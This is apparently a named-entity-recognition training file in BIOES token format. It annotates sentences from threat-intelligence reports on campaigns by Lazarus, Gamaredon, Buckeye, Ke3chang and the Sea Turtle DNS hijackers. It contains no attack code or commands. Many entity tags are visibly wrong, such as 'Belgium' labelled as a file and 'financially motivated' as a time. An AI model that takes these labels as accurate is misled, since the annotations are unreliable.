O +of O +the O +infected O +computer O +. O +As O +described O +in O +the O +infection O +flow O +, O +one O +of O +the O +first O +uses O +of O +the O +AutoHotKey B-FILE +scripts E-FILE +is O +to O +upload O +a O +screenshot O +from O +the O +compromised O +PC O +. O +It O +is O +hard O +to O +tell O +if O +there O +are O +geopolitical O +motives O +behind O +this O +campaign O +by O +looking O +solely O +at O +the O +list O +of O +countries O +it O +was O +targeting O +, O +since O +it O +was O +not O +after O +a O +specific O +region O +and O +the O +victims O +came O +from O +different B-LOC +places E-LOC +in O +the O +world O +. 
O +The O +initial O +infection O +vector O +used O +by O +the O +threat O +actor O +also O +changed O +over O +time O +, O +during O +2018 S-TIME +we O +have O +seen O +multiple O +uses O +of O +self-extracting O +archives S-MAL +instead O +of O +malicious O +documents O +with O +AutoHotKey S-APT +, O +which O +displayed O +a O +decoy B-MAL +image E-MAL +to O +the O +user O +. O +The O +recent O +wave O +of O +FASTCash B-ACT +attacks E-ACT +demonstrates O +that O +financially B-TIME +motivated E-TIME +attacks O +are O +not O +simply O +a O +passing O +interest O +for O +the O +Lazarus B-APT +group E-APT +and O +can O +now O +be O +considered O +one O +of O +its O +core O +activities O +. O +Although O +both O +examples O +of O +the O +different O +delivery O +methods O +described O +above O +show O +an O +exclusive O +targeting O +of O +Russian S-LOC +speakers O +, O +the O +recurring O +financial O +and O +political O +themes O +that O +they O +use O +highlight O +the O +attacker's S-APT +interest O +in O +the O +financial S-IDTY +world O +once O +more O +. O +Throughout O +our O +investigation O +, O +we O +have O +found O +evidence O +that O +shows O +operational O +similarities O +between O +this O +implant S-FILE +and O +Gamaredon S-APT +Group O +. O +Gamaredon B-APT +Group E-APT +is O +an O +alleged O +Russian S-LOC +threat O +group O +. O +Gamaredon B-APT +Group E-APT +has O +been O +active O +since O +at O +least O +2013 O +, O +and O +has O +targeted O +individuals O +likely O +involved O +with O +the O +Ukrainian B-IDTY +government E-IDTY +. O +EvilGnome's S-APT +functionalities O +include O +desktop B-MAL +screenshots E-MAL +, O +file B-MAL +stealing E-MAL +, O +allowing O +capturing B-MAL +audio I-MAL +recording E-MAL +from O +the O +user’s O +microphone O +and O +the O +ability O +to O +download O +and O +execute O +further O +modules O +. 
O +Gamaredon B-APT +Group E-APT +primarily O +makes O +use O +of O +Russian O +hosting O +providers O +in O +order O +to O +distribute O +its O +malware S-MAL +. O +Gamaredon B-APT +Group's E-APT +implants O +are O +characterized O +by O +the O +employment O +of O +information B-MAL +stealing I-MAL +tools E-MAL +— O +among O +them O +being O +screenshot O +and O +document O +stealers O +delivered O +via O +a O +SFX O +, O +and O +made O +to O +achieve O +persistence O +through O +a O +scheduled O +task O +. O +Gamaredon B-APT +Group E-APT +infects O +victims O +using O +malicious B-MAL +attachments E-MAL +, O +delivered O +via O +spear B-ACT +phishing E-ACT +techniques O +. O +The O +techniques O +and O +modules O +employed O +by O +EvilGnome S-APT +— O +that O +is O +the O +use O +of O +SFX S-MAL +, O +persistence O +with O +task O +scheduler O +and O +the O +deployment O +of O +information O +stealing O +tools—remind O +us O +of O +Gamaredon O +Group’s O +Windows B-FILE +tools E-FILE +. O +We O +can O +observe O +that O +the O +sample S-FILE +is O +very O +recent O +, O +created O +on O +Thursday O +, O +July B-TIME +4 E-TIME +. O +As O +can O +be O +observed O +in O +the O +illustration O +above O +, O +the O +makeself B-FILE +script E-FILE +is O +instructed O +to O +run O +./setup.sh S-FILE +after O +unpacking O +. O +The O +ShooterAudio B-FILE +module E-FILE +uses O +PulseAudio S-MAL +to O +capture O +audio O +from O +the O +user's O +microphone O +. O +makeself.sh S-FILE +is O +a O +small O +shell B-FILE +script E-FILE +that O +generates O +a O +self-extractable O +compressed O +tar O +archive O +from O +a O +directory O +. O +During O +our O +2018 S-TIME +monitoring O +of O +this O +group O +, O +we O +were O +able O +to O +identify O +different O +techniques O +utilized O +by O +very O +similar O +attackers O +in O +the O +MENA B-LOC +region E-LOC +, O +sometimes O +on O +the O +same O +target O +. 
O +Gaza B-APT +Cybergang I-APT +Group3 E-APT +(highest O +sophistication) O +whose O +activities O +previously O +went O +by O +the O +name O +Operation B-ACT +Parliament E-ACT +. O +Gaza B-APT +Cybergang E-APT +has O +been O +seen O +employing B-ACT +phishing E-ACT +, O +with O +several O +chained O +stages O +to O +evade O +detection O +and O +extend O +command O +and O +control O +server O +lifetimes O +. O +The O +most O +popular O +targets O +of O +SneakyPastes S-APT +are O +embassies S-IDTY +, O +government B-IDTY +entities E-IDTY +, O +education S-IDTY +, O +media B-IDTY +outlets E-IDTY +, O +journalists O +, O +activists S-IDTY +, O +political O +parties O +or O +personnel S-IDTY +, O +healthcare S-IDTY +and O +banking S-IDTY +. O +Through O +our O +continuous O +monitoring O +of O +threats O +during O +2018 S-TIME +, O +we O +observed O +a O +new O +wave O +of O +attacks O +by O +Gaza B-APT +Cybergang I-APT +Group1 E-APT +targeting O +embassies S-IDTY +and O +political B-IDTY +personnel E-IDTY +. O +Gaza B-APT +Cybergang I-APT +Group1 E-APT +is O +an O +attack O +group O +with O +limited O +infrastructure O +and O +an O +open-source O +type O +of O +toolset O +, O +which O +conducts O +widespread O +attacks O +, O +but O +is O +nevertheless O +focused O +on O +Palestinian S-IDTY +political O +problems O +. O +In O +this O +campaign O +, O +Gaza B-APT +Cybergang E-APT +used O +disposable B-ACT +emails S-TOOL +and O +domains O +as O +the O +phishing S-ACT +platform O +to O +target O +the O +victims O +. O +The O +RAT S-FILE +, O +however O +, O +had O +a O +multitude O +of O +functionalities O +(as O +listed O +in O +the O +table O +below) O +such O +as O +to O +download O +and O +execute O +, O +compress O +, O +encrypt O +, O +upload O +, O +search O +directories O +, O +etc O +. 
O +We O +expect O +the O +damage O +caused O +by O +these O +groups O +to O +intensify O +and O +the O +attacks S-APT +to O +extend O +into O +other O +regions O +that O +are O +also O +linked O +to O +the O +complicated B-IDTY +Palestinian I-IDTY +situation E-IDTY +. O +Cylance S-SECTEAM +determined O +that O +the O +‘Ghost B-APT +Dragon’ E-APT +group O +utilized O +specifically O +tailored O +variants O +of O +Gh0st B-MAL +RAT E-MAL +, O +which O +the O +group O +modified O +from O +the O +3.6 O +version O +of O +the O +source O +code O +released O +in O +2008 S-TIME +. O +The O +standard O +network O +protocol O +for O +Gh0st B-APT +RAT I-APT +3.6 E-APT +employs O +zlib B-MAL +compression E-MAL +, O +which O +utilizes O +‘Gh0st’ O +as O +a O +static O +five-byte O +packet O +flag O +that O +must O +be O +included O +in O +the O +first O +five O +bytes O +of O +initial O +transmission O +from O +the O +victim O +. O +In O +a O +more O +recent O +version O +of O +the O +modified O +Gh0st B-FILE +RAT E-FILE +malware O +, O +Ghost B-APT +Dragon E-APT +implemented O +dynamic O +packet O +flags O +which O +change O +the O +first O +five O +bytes O +of O +the O +header O +in O +every O +login O +request O +with O +the O +controller O +. O +SPEAR O +has O +observed O +numerous O +different O +XOR O +keys O +utilized O +by O +Ghost B-APT +Dragon E-APT +. O +exploit S-VULNAME +and O +tools O +continued O +to O +be O +used O +after O +Buckeye's S-APT +apparent O +disappearance O +in O +2017 S-TIME +. O +The O +Buckeye S-APT +attack O +group O +was O +using O +Equation B-MAL +Group I-MAL +tools E-MAL +to O +gain O +persistent O +access O +to O +target O +organizations O +at O +least O +a O +year O +prior O +to O +the O +Shadow B-ACT +Brokers I-ACT +leak E-ACT +. O +Buckeye's S-APT +use O +of O +Equation O +Group O +tools O +also O +involved O +the O +exploit S-VULNAME +of O +a O +previously O +unknown O +Windows S-OS +zero-day S-ACT +vulnerability O +. 
O +While O +Buckeye S-APT +appeared O +to O +cease O +operations O +in O +mid-2017 O +, O +the O +Equation B-MAL +Group I-MAL +tools E-MAL +it O +used O +continued O +to O +be O +used O +in O +attacks O +until O +late S-TIME +2018 S-TIME +. O +The O +2017 B-ACT +leak E-ACT +of O +Equation O +Group O +tools O +by O +a O +mysterious B-APT +group E-APT +calling O +itself O +the O +Shadow O +Brokers O +was O +one O +of O +the O +most O +significant O +cyber O +security O +stories O +in O +recent O +years. O +However O +, O +Symantec S-SECTEAM +has O +now O +found O +evidence O +that O +the O +Buckeye S-APT +Cyber B-ACT +Espionage E-ACT +group O +(aka B-APT +APT3 E-APT +, O +Gothic B-APT +Panda E-APT +) O +began O +using O +Equation B-MAL +Group I-MAL +tools E-MAL +in O +attacks O +at O +least O +a O +year O +prior O +to O +the O +Shadow O +Brokers O +leak O +. O +Equation S-APT +is O +regarded O +as O +one O +of O +the O +most O +technically O +adept O +espionage O +groups O +and O +the O +release O +of O +a O +trove S-MAL +of O +its O +tools O +had O +a O +major O +impact O +, O +with O +many O +attackers O +rushing O +to O +deploy O +the O +malware O +and O +exploits O +disclosed O +. O +DoublePulsar S-APT +was O +delivered O +to O +victims O +using O +a O +custom O +exploit B-MAL +tool E-MAL +(Trojan.Bemstour) O +that O +was O +specifically O +designed O +to O +install O +DoublePulsar O +. O +One O +vulnerability O +is O +a O +Windows S-OS +zero-day S-VULNAME +vulnerability O +(CVE-2019-0703) O +discovered O +by O +Symantec S-SECTEAM +. O +Bemstour S-APT +exploits O +two O +Windows S-OS +vulnerabilities S-VULNAME +in O +order O +to O +achieve O +remote O +kernel O +code O +execution O +on O +targeted O +computers O +. 
O + +The O +second O +Windows S-OS +vulnerability O +( O +CVE-2017-0143 S-VULID +) O +was O +patched O +in O +March B-TIME +2017 E-TIME +after O +it O +was O +discovered O +to O +have O +been O +used O +by O +two O +exploit S-VULNAME +tools O +EternalRomance S-VULNAME +and O +EternalSynergy S-VULNAME +that O +were O +also O +released O +as O +part O +of O +the O +Shadow B-APT +Brokers E-APT +leak O +. O + +It O +was O +reported O +by O +Symantec S-SECTEAM +to O +Microsoft S-IDTY +in O +September B-TIME +2018 E-TIME +and O +was O +patched O +on O +March O +12 O +, O +2019 O +. O +How O +Buckeye S-APT +obtained O +Equation B-MAL +Group I-MAL +tools E-MAL +at O +least O +a O +year O +prior O +to O +the O +Shadow O +Brokers O +leak O +remains O +unknown O +. O + +The O +Buckeye S-APT +attack O +group O +had O +been O +active O +since O +at O +least O +2009 S-TIME +, O +when O +it O +began O +mounting O +a O +string O +of O +espionage B-ACT +attacks E-ACT +, O +mainly O +against O +organizations O +based O +in O +the B-LOC +U.S E-LOC +. O + +These O +include O +CVE-2010-3962 S-VULID +as O +part O +of O +an O +attack B-ACT +campaign E-ACT +in O +2010 S-TIME +and O +CVE-2014-1776 S-VULID +in O +2014 S-TIME +. O +Beginning O +in O +August B-TIME +2016 E-TIME +, O +a O +group O +calling O +itself O +the O +Shadow B-APT +Brokers E-APT +began O +releasing O +tools O +it O +claimed O +to O +have O +originated O +from O +the O +Equation S-APT +Group O +. O +Over O +the O +coming O +months O +, O +it O +progressively O +released O +more O +tools O +, O +until O +April O +2017 O +, O +when O +it O +released O +a O +final O +, O +large O +cache O +of O +tools O +, O +including O +the O +DoublePulsar B-MAL +backdoor E-MAL +, O +the O +FuzzBunch S-MAL +framework S-MAL +, O +and O +the O +EternalBlue S-MAL +, O +EternalSynergy S-MAL +, O +and O +EternalRomance S-MAL +exploit S-MAL +tools S-MAL +. 
O +However O +, O +Buckeye S-APT +had O +already O +been O +using O +some O +of O +these O +leaked B-MAL +tools E-MAL +at O +least O +a O +year O +beforehand O +. O +The O +earliest O +known O +use O +of O +Equation B-MAL +Group I-MAL +tools E-MAL +by O +Buckeye S-APT +is O +March B-TIME +31 E-TIME +, O +2016 S-TIME +, O +during O +an O +attack O +on O +a O +target O +in O +Hong B-LOC +Kong E-LOC +. O +Beginning O +in O +March B-TIME +2016 E-TIME +, O +Buckeye S-APT +began O +using O +a O +variant O +of O +DoublePulsar O +(Backdoor.Doublepulsar) O +, O +a O +backdoor O +that O +was O +subsequently O +released O +by O +the O +Shadow B-APT +Brokers E-APT +in O +2017 S-TIME +. O +However O +, O +while O +activity O +involving O +known O +Buckeye S-APT +tools O +ceased O +in O +mid-2017 O +, O +the O +Bemstour B-MAL +exploit I-MAL +tool E-MAL +and O +the O +DoublePulsar S-MAL +variant O +used O +by O +Buckeye O +continued O +to O +be O +used O +until O +at O +least O +September B-TIME +2018 E-TIME +in O +conjunction O +with O +different O +malware O +. O +During O +this O +attack O +, O +the O +Bemstour O +exploit S-VULNAME +tool O +was O +delivered O +to O +victims O +via O +known O +Buckeye S-MAL +malware S-MAL +(Backdoor.Pirpi) O +. O +One O +hour O +later O +, O +Bemstour S-FILE +was O +used O +against O +an O +educational O +institution O +in O +Belgium S-FILE +. O +Bemstour S-FILE +is O +specifically O +designed O +to O +deliver O +a O +variant O +of O +the O +DoublePulsar B-MAL +backdoor E-MAL +. O +DoublePulsar S-FILE +is O +then O +used O +to O +inject O +a O +secondary O +payload O +, O +which O +runs O +in O +memory O +only O +. O +A O +significantly O +improved O +variant O +of O +the O +Bemstour S-FILE +exploit S-VULNAME +tool O +was O +rolled O +out O +in O +September B-TIME +2016 E-TIME +, O +when O +it O +was O +used O +in O +an O +attack O +against O +an O +educational O +institution O +in O +Hong B-LOC +Kong E-LOC +. 
O +When O +used O +against O +32-bit O +targets O +, O +Bemstour S-MAL +still O +delivered O +the O +same O +DoublePulsar B-MAL +backdoor E-MAL +. O +Bemstour S-FILE +was O +used O +again O +in O +June O +2017 O +in O +an O +attack O +against O +an O +organization O +in O +Luxembourg S-LOC +. O +Between O +June O +and O +September O +2017 O +, O +Bemstour S-FILE +was O +also O +used O +against O +targets O +in O +the O +Philippines S-LOC +and O +Vietnam S-LOC +. O +Development O +of O +Bemstour S-FILE +has O +continued O +into O +2019 S-TIME +. O +Unlike O +earlier O +attacks O +when O +Bemstour S-FILE +was O +delivered O +using O +Buckeye's O +Pirpi S-FILE +backdoor S-FILE +, O +in O +this O +attack O +Bemstour O +was O +delivered O +to O +the O +victim O +by O +a O +different B-MAL +backdoor E-MAL +Trojan S-MAL +(Backdoor.Filensfer) O +. O +The O +most O +recent O +sample O +of O +Bemstour S-FILE +seen O +by O +Symantec S-SECTEAM +appears O +to O +have O +been O +compiled O +on O +March B-TIME +23 E-TIME +, O +2019 O +, O +eleven O +days O +after O +the O +zero-day S-VULNAME +vulnerability O +was O +patched O +by O +Microsoft S-IDTY +. O +Filensfer S-FILE +is O +a O +family O +of O +malware O +that O +has O +been O +used O +in O +targeted O +attacks O +since O +at O +least O +2013 S-TIME +. O +The O +zero-day S-VULNAME +vulnerability O +found O +and O +reported O +by O +Symantec S-SECTEAM +(CVE-2019-0703) S-VULID +occurs O +due O +to O +the O +ACT O +the O +Windows S-OS +SMB O +Server O +handles O +certain O +requests O +. O +While O +Symantec S-SECTEAM +has O +never O +observed O +the O +use O +of O +Filensfer S-FILE +alongside O +any O +known O +Buckeye O +tools O +, O +information O +shared O +privately O +by O +another O +vendor O +included O +evidence O +of O +Filensfer O +being O +used O +in O +conjunction O +with O +known O +Buckeye B-FILE +malware E-FILE +(Backdoor.Pirpi) S-MAL +. 
O +CVE-2017-0143 S-VULID +was O +also O +used O +by O +two O +other O +exploit S-VULNAME +tools—EternalRomance S-FILE +and O +EternalSynergy—that S-FILE +were O +released O +as O +part O +of O +the O +Shadow O +Brokers O +leak O +in O +April B-TIME +2017 E-TIME +. O +Buckeye's O +exploit S-VULNAME +tool O +, O +EternalRomance S-FILE +, O +as O +well O +as O +EternalSynergy S-FILE +, O +can O +exploit S-VULNAME +the O +CVE-2017-0143 S-FILE +message O +type O +confusion O +vulnerability O +to O +perform O +memory O +corruption O +on O +unpatched O +victim O +computers O +. O +In O +the O +case O +of O +the O +Buckeye B-MAL +exploit I-MAL +tool E-MAL +, O +the O +attackers O +exploited O +their O +own O +zero-day S-VULNAME +vulnerability O +(CVE-2019-0703) O +. O +It O +is O +noteworthy O +that O +the O +attackers S-APT +never O +used O +the O +FuzzBunch B-MAL +framework E-MAL +in O +its O +attacks O +. O +FuzzBunch S-MAL +is O +a O +framework O +designed O +to O +manage O +DoublePulsar O +and O +other O +Equation O +Group O +tools O +and O +was O +leaked O +by O +the O +Shadow B-APT +Brokers E-APT +in O +2017 O +. O +There O +are O +multiple O +possibilities O +as O +to O +how O +Buckeye S-APT +obtained O +Equation B-APT +Group E-APT +tools O +before O +the O +Shadow O +Brokers O +leak O +. O +However O +, O +aside O +from O +the O +continued O +use O +of O +the O +tools O +, O +Symantec S-SECTEAM +has O +found O +no O +other O +evidence O +suggesting O +Buckeye S-APT +has O +retooled O +. O +this O +RTF S-TOOL +exploits O +again O +the O +CVE-2017-1882 S-VULID +on O +eqnedt32.exe S-FILE +. O +And O +the O +dropper S-FILE +execute O +the O +iassvcs.exe S-FILE +to O +make O +a O +side O +loading O +and O +make O +the O +persistence O +. 
O +This O +IP S-PROT +is O +very O +interesting O +because O +it O +connects O +with O +tele.zyns.com O +and O +old O +infrastructures O +used O +by O +chinese B-APT +APT E-APT +or O +DDOS O +Chinese O +team O +against O +the O +ancient B-IDTY +soviet I-IDTY +republics E-IDTY +. O +Over O +the O +past O +three O +years O +, O +Filensfer S-FILE +has O +been O +deployed O +against O +organizations O +in O +Luxembourg S-LOC +, O +Sweden S-LOC +, O +Italy S-LOC +, O +the B-LOC +UK E-LOC +, O +and O +the B-LOC +U.S E-LOC +. O +All O +zero-day S-VULNAME +exploits O +known O +, O +or O +suspected O +, O +to O +have O +been O +used O +by O +this O +group O +are O +for O +vulnerabilities O +in O +Internet B-MAL +Explorer E-MAL +and O +Flash S-MAL +. O +According O +to O +reports O +, O +the O +Philippines S-LOC +is O +the O +most O +exposed O +country O +in O +ASEAN O +to O +the O +cyberattacks S-APT +known O +as O +advanced O +persistent O +threats O +, O +or O +APTs O +. O +Our O +analysis O +of O +this O +malware O +shows O +that O +it O +belongs O +to O +Hussarini S-FILE +, O +also O +known O +as O +Sarhust O +, O +a O +backdoor O +family O +that O +has O +been O +used O +actively O +in O +APT O +attacks O +targeting O +countries O +in O +the O +ASEAN B-LOC +region E-LOC +since O +2014 S-TIME +. O +OutExtra.exe S-FILE +is O +a O +signed O +legitimate O +application O +from O +Microsoft S-IDTY +named O +finder.exe S-FILE +. O +In O +addition O +to O +file-based O +protection O +, O +customers O +of O +the O +DeepSight S-SECTEAM +Intelligence O +Managed O +Adversary O +and O +Threat O +Intelligence O +(MATI) O +service O +have O +received O +reports O +on O +Buckeye S-APT +, O +which O +detail O +methods O +of O +detecting O +and O +thwarting O +activities O +of O +this O +group O +. O +However O +, O +in O +this O +attack S-APT +, O +this O +file O +is O +used O +to O +load O +the O +Hussarini O +backdoor O +via O +DLL S-MAL +hijacking S-MAL +. 
O +Today O +, O +this O +malware S-FILE +is O +still O +actively O +being O +used O +against O +the O +Philippines S-LOC +. O +Hussarini O +was O +first O +mentioned O +in O +APT O +campaigns O +targeting O +the O +Philippines S-LOC +and O +Thailand O +in O +2014 O +. O +Further O +analysis O +showed O +that O +the O +Iron S-APT +cybercrime O +group O +used O +two O +main O +functions O +from O +HackingTeam's O +source O +in O +both O +IronStealer S-MAL +and O +Iron B-MAL +ransomware E-MAL +. O +Xagent” S-FILE +is O +the O +original O +filename O +Xagent.exe S-FILE +whereas O +seems O +to O +be O +the O +version O +of O +the O +worm S-FILE +. O +Xagent S-APT +– O +A O +variant O +of O +JbossMiner B-APT +Mining E-APT +Worm” O +– O +a O +worm O +written O +in O +Python S-TOOL +and O +compiled O +using O +PyInstaller O +for O +both O +Windows S-OS +and O +Linux S-OS +platforms O +. O +Its O +activities O +were O +traced O +back O +to O +2010 S-TIME +in O +FireEye's S-SECTEAM +2013 O +report O +on O +operation O +Ke3chang S-APT +– O +a O +cyberespionage O +campaign O +directed O +at O +diplomatic O +organizations O +in O +Europe S-LOC +. O +We O +have O +been O +tracking O +the O +malicious O +activities O +related O +to O +this O +threat O +actor O +and O +discovered O +a O +previously O +undocumented O +malware O +family O +with O +strong O +links O +to O +the O +Ke3chang S-APT +group O +– O +a O +backdoor S-MAL +we O +named O +Okrum S-MAL +. O +Furthermore O +, O +from O +2015 O +to O +2019 O +, O +we O +detected O +new O +versions O +of O +known O +malware O +families O +attributed O +to O +the O +Ke3chang S-APT +group O +– O +BS2005 B-MAL +backdoors E-MAL +from O +operation O +Ke3chang O +and O +the O +RoyalDNS S-MAL +malware S-MAL +, O +reported O +by O +NCC S-SECTEAM +Group O +in O +2018 S-TIME +. 
O +Ke3chang S-APT +behind O +the O +attacks O +seemed O +to O +have O +a O +particular O +interest O +in O +Slovakia S-LOC +, O +where O +a O +big O +portion O +of O +the O +discovered O +malware O +samples O +was O +detected; O +Croatia S-LOC +, O +the O +Czech B-LOC +Republic E-LOC +and O +other O +countries O +were O +also O +affected O +. O +Our O +technical O +analysis O +of O +the O +malware S-FILE +used O +in O +these O +attacks O +showed O +close O +ties O +to O +BS2005 B-FILE +backdoors E-FILE +from O +operation O +Ke3chang O +, O +and O +to O +a O +related O +TidePool B-FILE +malware E-FILE +family O +discovered O +by O +Palo B-SECTEAM +Alto E-SECTEAM +Networks O +in O +2016 S-TIME +that O +targeted O +Indian O +embassies O +across O +the O +globe O +. O +The O +story O +continued O +in O +late O +2016 S-TIME +, O +when O +we O +discovered O +a O +new O +, O +previously O +unknown O +backdoor S-MAL +that O +we O +named O +Okrum S-MAL +. O +The O +malicious O +actors O +behind O +the O +Okrum B-FILE +malware E-FILE +were O +focused O +on O +the O +same O +targets O +in O +Slovakia S-LOC +that O +were O +previously O +targeted O +by O +Ketrican O +2015 O +backdoors S-FILE +. O +We O +started O +connecting O +the O +dots O +when O +we O +discovered O +that O +the O +Okrum B-FILE +backdoor E-FILE +was O +used O +to O +drop O +a O +Ketrican B-FILE +backdoor E-FILE +, O +freshly O +compiled O +in O +2017 O +. O +In O +2017 O +, O +the O +same O +entities O +that O +were O +affected O +by O +the O +Okrum B-FILE +malware E-FILE +and O +by O +the O +2015 O +Ketrican B-FILE +backdoors E-FILE +again O +became O +targets O +of O +the O +malicious O +actors O +. O +This O +time O +, O +the O +attackers O +used O +new O +versions O +of O +the O +RoyalDNS B-FILE +malware E-FILE +and O +a O +Ketrican S-FILE +2017 O +backdoor O +. 
O +According O +to O +ESET S-SECTEAM +telemetry O +, O +Okrum S-FILE +was O +first O +detected O +in O +December B-TIME +2016 E-TIME +, O +and O +targeted O +diplomatic O +missions O +in O +Slovakia S-LOC +, O +Belgium S-LOC +, O +Chile S-LOC +, O +Guatemala S-LOC +and O +Brazil S-LOC +throughout O +2017 O +. O +In O +addition O +to O +file-based O +protection O +, O +customers O +of O +the O +DeepSight S-SECTEAM +has O +received O +reports O +on O +Buckeye S-APT +, O +which O +detail O +methods O +of O +detecting O +and O +thwarting O +activities O +of O +this O +group O +. O +In O +2018 S-TIME +, O +we O +discovered O +a O +new O +version O +of O +the O +Ketrican O +backdoor O +that O +featured O +some O +code O +improvements O +. O +According O +to O +our O +telemetry O +, O +Okrum S-FILE +was O +used O +to O +target O +diplomatic O +missions O +in O +Slovakia S-LOC +, O +Belgium S-LOC +, O +Chile S-LOC +, O +Guatemala S-LOC +, O +and O +Brazil S-LOC +, O +with O +the O +attackers O +showing O +a O +particular O +interest O +in O +Slovakia O +. O +Indeed O +, O +we O +have O +detected O +various O +external O +tools O +being O +abused O +by O +Okrum S-APT +, O +such O +as O +a O +keylogger S-MAL +, O +tools S-MAL +for O +dumping O +passwords O +, O +or O +enumerating B-MAL +network I-MAL +sessions E-MAL +. O +The O +detection O +evasion O +techniques O +we O +observed O +in O +the O +Okrum S-FILE +malware O +include O +embedding O +the O +malicious O +payload O +within O +a O +legitimate O +PNG O +image O +, O +employing O +several O +anti-emulation O +and O +anti-sandbox O +tricks O +, O +as O +well O +as O +making O +frequent O +changes O +in O +implementation O +. 
O +The O +unnamed O +company O +makes O +products O +used O +in O +the O +military O +and O +aerospace O +industries O +, O +and O +the O +hackers O +could O +have O +been O +after O +commercial O +secrets O +or O +more O +traditional O +espionage O +, O +according O +to O +ClearSky S-SECTEAM +, O +the O +cybersecurity O +firm O +that O +exposed O +the O +operation S-ACT +. O +North O +Korean O +dictator O +Kim O +Jong O +Un O +has O +set O +ambitious O +economic O +goals O +, O +and O +some O +cybersecurity O +analysts O +have O +predicted O +he O +will O +unleash O +the O +Pyongyang-affiliated B-APT +hackers E-APT +to O +meet O +those O +deadlines O +by O +targeting O +multinational B-IDTY +companies’ E-IDTY +trade O +secrets O +. O +According O +to O +ClearSky S-SECTEAM +, O +the O +suspected O +Lazarus O +operatives O +looked O +to O +leverage O +a O +vulnerability O +in O +outdated O +WinRAR S-FILE +file-archiving O +software O +that O +hackers O +have O +been O +exploiting O +since O +it O +was O +disclosed O +last O +month O +. O +This O +new O +Lotus B-APT +Blossom E-APT +campaign O +delivers O +a O +malicious B-ACT +RTF E-ACT +document O +posing O +as O +an O +ASEAN S-LOC +Defence O +Minister's O +Meeting O +(ADMM) O +directory O +(decoy) O +that O +also O +carries O +an O +executable O +(payload) O +embedded O +as O +an O +OLE O +object O +, O +the O +Elise O +backdoor O +. O +Just O +months O +after O +the O +APT32 S-APT +watering B-ACT +hole I-ACT +activity E-ACT +against O +ASEAN-related O +websites O +was O +observed O +in O +Fall O +2017 O +, O +this O +new O +activity O +clearly O +indicates O +the O +association O +(ASEAN) O +clearly O +remains O +a O +priority O +collection O +target O +in O +the O +region O +. 
O +Researchers S-SECTEAM +implicated O +Lazarus S-APT +Group O +because O +of O +digital O +clues O +including O +a O +malicious B-MAL +implant E-MAL +known O +as O +Rising B-APT +Sun E-APT +that O +has O +been O +attributed O +to O +the O +group O +. O +The O +attackers S-APT +originally O +embedded S-ACT +an O +implant O +into O +the O +malicious O +document O +as O +a O +hypertext O +application O +(HTA) O +file O +, O +and O +then O +quickly O +moved O +to O +hide O +it O +in O +an O +image O +on O +a O +remote O +server O +and O +used O +obfuscated O +Visual B-TOOL +Basic E-TOOL +macros O +to O +launch O +the O +decoder O +script O +. O +Lazarus S-APT +used O +the O +open-source O +tool O +Invoke-PSImage S-MAL +, O +released O +December O +20 O +, O +to O +embed O +the O +PowerShell S-TOOL +script O +into O +the O +image O +file O +. O +Once O +the O +script O +runs O +, O +it S-APT +passes O +the O +decoded O +script O +from O +the O +image O +file O +to O +the O +Windows S-OS +command O +line O +in O +a O +variable O +$x O +, O +which O +uses O +cmd.exe S-FILE +to O +execute O +the O +obfuscated O +script O +and O +run O +it O +via O +PowerShell S-MAL +. O +The O +Department O +of O +Homeland O +Security O +(DHS) S-SECTEAM +issued O +an O +alert O +about O +this O +activity O +on O +Jan. B-TIME +24 I-TIME +2019 E-TIME +, O +warning O +that O +an O +attacker O +could O +redirect O +user O +traffic O +and O +obtain O +valid O +encryption O +certificates O +for O +an O +organization's O +domain O +names O +. O +In O +the O +Sea B-ACT +Turtle E-ACT +campaign O +, O +Talos S-SECTEAM +was O +able O +to O +identify O +two O +distinct O +groups O +of O +victims O +. O +The O +first O +group O +, O +we O +identify O +as O +primary O +victims O +, O +includes O +national B-IDTY +security I-IDTY +organizations E-IDTY +, O +ministries S-IDTY +of O +foreign O +affairs O +, O +and O +prominent B-IDTY +energy I-IDTY +organizations E-IDTY +. 
O +The O +threat O +actors S-APT +behind O +the O +Sea B-ACT +Turtle E-ACT +campaign O +show O +clear O +signs O +of O +being O +highly O +capable O +and O +brazen O +in O +their O +endeavors O +. O +In O +most O +cases O +, O +threat O +actors S-APT +typically O +stop O +or O +slow B-ACT +down I-ACT +their I-ACT +activities E-ACT +once O +their O +campaigns O +are O +publicly O +revealed O +. O +The O +threat O +actors S-APT +behind O +the O +Sea B-ACT +Turtle E-ACT +campaign O +were O +successful O +in O +compromising O +entities O +by O +manipulating O +and O +falsifying O +DNS S-PROT +records O +at O +various O +levels O +in O +the O +domain O +name O +space O +. O +If O +an O +attacker S-APT +was O +able O +to O +compromise O +an O +organization's O +network O +administrator O +credentials O +, O +the O +attacker O +would O +be O +able O +to O +change O +that O +particular O +organization's O +DNS S-PROT +records O +at O +will O +. O +If O +the O +attackers S-APT +were O +able O +to O +obtain O +one O +of O +these O +EPP O +keys O +, O +they O +would O +be O +able O +to O +modify O +any O +DNS S-PROT +records O +that O +were O +managed O +by O +that O +particular O +registrar O +. O +Captured O +legitimate O +user O +credentials O +when O +users O +interacted O +with O +these O +actor S-APT +- O +controlled S-ACT +servers S-ACT +. O +The O +diagram O +below O +illustrates O +how O +we O +believe O +the O +actors O +behind O +the O +Sea B-FILE +Turtle E-FILE +campaign O +used O +DNS S-PROT +hijacking O +to O +achieve O +their O +end O +goals O +. O +As O +of O +early B-TIME +2019 E-TIME +, O +the O +only O +evidence O +of O +the O +spear-phishing S-ACT +threat B-APT +vector E-APT +came O +from O +a O +compromised O +organization's O +public O +disclosure O +. 
O +On O +January O +4 O +, O +Packet O +Clearing O +House O +, O +which O +is O +not O +an O +Internet O +exchange O +point O +but O +rather O +is O +an O +NGO O +which O +provides O +support O +to O +Internet O +exchange O +points O +and O +the O +core O +of O +the O +domain O +name O +system O +, O +provided O +confirmation O +of O +this O +aspect O +of O +the O +actors’ S-APT +tactics O +when O +it O +publicly O +revealed O +its O +internal O +DNS S-PROT +had O +been O +briefly O +hijacked S-ACT +as O +a O +consequence O +of O +the O +compromise O +at O +its O +domain O +registrar O +. O +During O +a O +typical O +incident O +, O +the O +actor S-APT +would O +modify O +the O +NS O +records O +for O +the O +targeted O +organization O +, O +pointing O +users O +to O +a O +malicious O +DNS S-PROT +server O +that O +provided O +actor-controlled O +responses O +to O +all O +DNS S-PROT +queries O +. O +The O +next O +step O +for O +the O +actor S-APT +was O +to O +build O +MitM B-MAL +servers E-MAL +that O +impersonated O +legitimate O +services O +to O +capture O +user O +credentials O +. O +In O +addition O +to O +the O +MitM B-MAL +server E-MAL +IP S-PROT +addresses O +published O +in O +previous O +reports O +, O +Talos S-SECTEAM +identified O +16 O +additional B-MAL +servers E-MAL +leveraged O +by O +the O 